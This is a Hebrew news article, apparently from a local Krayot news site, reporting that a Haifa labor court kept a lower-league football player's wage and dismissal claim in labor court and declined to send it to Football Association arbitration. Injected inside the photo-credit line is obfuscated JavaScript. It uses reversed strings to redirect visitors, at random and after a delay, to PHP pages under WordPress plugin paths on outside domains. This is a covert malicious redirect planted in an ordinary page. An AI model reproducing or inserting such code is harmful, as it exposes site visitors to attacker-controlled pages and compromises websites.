fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

גם לשחקני כדורגל יש זכויות

בית הדין לעבודה דחה בקשה להעביר דיון בתביעה כספית להתאחדות לכדורגל תוך נימוק לחשש לפגיעה בערכים של משפט העבודה
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בית הדין האזורי לעבודה בחיפה נתן החלטה שמשנה את יחסי הכוחות בין שחקני כדורגל לקבוצות שבהן הם משחקים בכל הנוגע ליחסי עובד מעביד. החלטת בית הדין ניתנה בעקבות תביעה שהגיש שחקן כדורגל מהליגות הנמכות נגד קבוצתו.

מן הידועות היא כי בליגות הנמוכות תנאי השכר של השחקנים הם נמוכים ופעמים רבות השחקנים כלל אינם מודעים לזכויות המגיעות להם. בנוסף בקבוצות רבות שורר אי סדר כספי והפיקוח עליהן לוקה בחסר. עבור שחקנים רבים מדובר בסוג של "עבודה שנייה" ויש את אלו שמוכנים לשחק בכל מחיר, בתקווה שמתישהו הם יפרצו ויגיעו לליגות הבכירות.

החלטת בית הדין מתייחסת לתביעה שהגיש שחקן כדורגל נגד קבוצה שפיטרה אותו. הקבוצה נתבעה לשלם לשחקן פיצויים בגין הפרת הסכם, הלנת שכר, שכר עבודה ומרכיבים נוספים אולם היא הגישה בקשה להעביר את הדיון לבוררות בהתאחדות לכדורגל בישראל. לטענת הקבוצה, מהרגע ששחקן רשום בהתאחדות לכדורגל, חלים עליו הוראות חוק הספורט.

עו"ד מימון פאר. צילום: דורון גולן

עו"ד מימון פאר שמייצג את השחקן, טען בפני בית הדין כי מדובר בזכויות עובד קוגנטיות שמקורן במשפט העבודה המגן. הוא ציין כי הוראות בית הדין לעבודה גוברות על חוק הספורט והסמכות לדון בתביעה היא של בית הדין לעבודה.

בזכויות עובד קוגנטיות מדובר למעשה בחוקי מגן מחייבים ולא ניתן להתנות עליהם. המעסיק אינו יכול להעסיק עובד בניגוד להוראות חוקי המגן. העובד או נציגות עובדים אינם יכולים  לוותר על זכות מהזכויות המוענקות בחוקים אלו, אף לא בחוזה אישי או הסכם קיבוצי.

השופט טל גולן קיבל את טענתו של עו"ד פאר. הוא ציין כי הרכיבים המופיעים בתביעה כמו הלנת שכר, הפרת הסכם ושכר עבודה, שייכים למשפט העבודה המגן ובסיסן נמצא בהוראת חקיקת העבודה והלכות בית הדין הארצי. השופט הוסיף שאין יעילות בכך שחלק מהסכסוך יידון בבית הדין וחלקו בפני בוררות חיצונית ואמר: "הדבר אף יכול להוביל להכרעות סותרות ואף לפגיעה בערכים המונחים בבסיס משפט העבודה".

השופט דחה את בקשתה של קבוצת הכדורגל להפנות את הדיון למוסד לבוררות של ההתאחדות לכדורגל והתביעה נגדה תימשך בבית הדין לעבודה. בעקבות ההחלטה מסר עו"ד פאר כי בימים הקרובים הוא מתכוון להעלות את סוגיית השכר של שחקני כדורגל בפני חברי הכנסת הנבחרת ולהעלות את הנושא לדיון ציבורי.

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות